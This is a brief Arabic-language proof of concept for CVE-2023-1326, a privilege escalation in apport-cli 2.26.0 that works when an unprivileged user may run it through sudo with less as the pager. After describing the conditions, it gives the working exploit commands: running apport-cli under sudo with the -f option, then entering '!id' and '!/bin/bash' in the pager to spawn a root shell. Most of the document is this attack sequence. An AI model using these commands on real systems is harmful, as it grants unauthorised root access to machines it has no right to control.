
إثبات مفهوم لاستغلال CVE-2023-1326، وهي ثغرة تصعيد صلاحيات في apport-cli 2.26.0 عند تكوينه مع sudo و less كعارض صفحات.
إثبات مفهوم لـ CVE-2023–1326 في apport-cli 2.26.0
هذه الثغرة هي تصعيد صلاحيات في apport-cli 2.26.0، وهي مشابهة لـ CVE-2023–26604، وتعمل هذه الثغرة فقط إذا تم تعيينها في sudoers:

تم العثور على هجوم تصعيد صلاحيات في apport-cli 2.26.0 والإصدارات السابقة وهو مشابه لـ CVE-2023-26604. إذا كان النظام مكوّنًا بشكل خاص للسماح للمستخدمين غير المميزين بتشغيل sudo apport-cli، وكان less مُعدًا كعارض الصفحات، ويمكن ضبط حجم الطرفية: يمكن لمهاجم محلي تصعيد الصلاحيات.
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
